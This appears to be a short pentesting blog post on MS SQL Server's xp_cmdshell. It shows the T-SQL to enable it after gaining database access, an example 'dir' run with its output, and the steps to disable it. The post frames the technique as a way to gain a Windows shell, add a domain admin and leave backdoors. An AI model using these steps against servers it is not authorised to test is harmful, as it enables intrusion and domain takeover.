0wn!ng using xp_cmdshell

Background

Well we all know “xp_cmdshell” and its history. It is a windows shell that gets spawns and uses string argument for command execution. The point is what the big deal?

Impact

The moment you get the access of the MS SQL Server while doing any penetration testing or vulnerability assessment, the next thing that will run in your mind is to enable xp_cmdshell.

Why?

Simple reason is that it gives you a windows shell from which you can execute windows commands. Now there is no limit to some one’s creativity for exploiting such juicy finding. I would like to own the server by adding a domain admin user and owning the entire domain 🙂 Others probably would like to get in the network and make backdoor for later use, everybody has their own choices.

Usage

Before we even use this shell we have to enable it first 🙂 In order to enable this you can use following commands

-- To allow advanced options to be changed.

EXEC sp_configure 'show advanced options', 1

GO

-- To update the currently configured value for advanced options.

RECONFIGURE

GO

-- To enable the feature.

EXEC sp_configure 'xp_cmdshell', 1

GO

-- To update the currently configured value for this feature.

RECONFIGURE

GO

Now that we have enabled it, let’s see how to use it. You can use following commands to use sql shell.

Usage:

xp_cmdshell { 'cmd_str' } [ , no_o/p ]

cmd_str: command to be passed

no_o/p: whether client wants any output or not, it is optional parameter.

Example:

USE master;

xp_cmdshell ‘dir’

Output

Volume in drive C has no label.
Volume Serial Number is E27A-3074

Directory of C:

02/02/2012  09:29 AM    <DIR>          common
06/11/2009  03:12 AM                10 config.sys
05/31/2011  04:12 PM    <DIR>          dell
09/27/2011  01:34 PM    <DIR>          inetpub
11/25/2011  02:31 PM            15,478 init.rc
05/31/2011  04:45 PM    <DIR>          Intel
10/20/2011  02:51 PM    <DIR>          OpenSSL-Win32
07/14/2009  08:07 AM    <DIR>          PerfLogs
09/24/2011  03:21 PM    <DIR>          Perl
03/26/2012  04:49 PM    <DIR>          Program Files
03/05/2012  11:40 AM    <DIR>          Python27
11/16/2011  09:46 AM    <DIR>          Temp
09/28/2011  12:01 PM    <DIR>          Users
03/26/2012  05:05 PM    <DIR>          Windows
09/23/2011  02:19 PM    <DIR>          xampp
12 File(s)        732,235 bytes
14 Dir(s)  62,720,782,336 bytes free

Now you can run any commands of your choice

Solution

I will not stop only at how enable and use the xp_cmdshell, I will also show how to disable it. You can use following options to disable it.

-- To allow advanced options to be changed.

EXEC sp_configure 'show advanced options', 1

GO

-- To update the currently configured value for advanced options.

RECONFIGURE

GO

-- To disable the feature.

EXEC sp_configure 'xp_cmdshell', 0

GO

-- To update the currently configured value for this feature.

RECONFIGURE

GO

Conclusion

Use best practices

xp_cmdshell { 'command_string' } [ , no_output ]
Tagged with: ,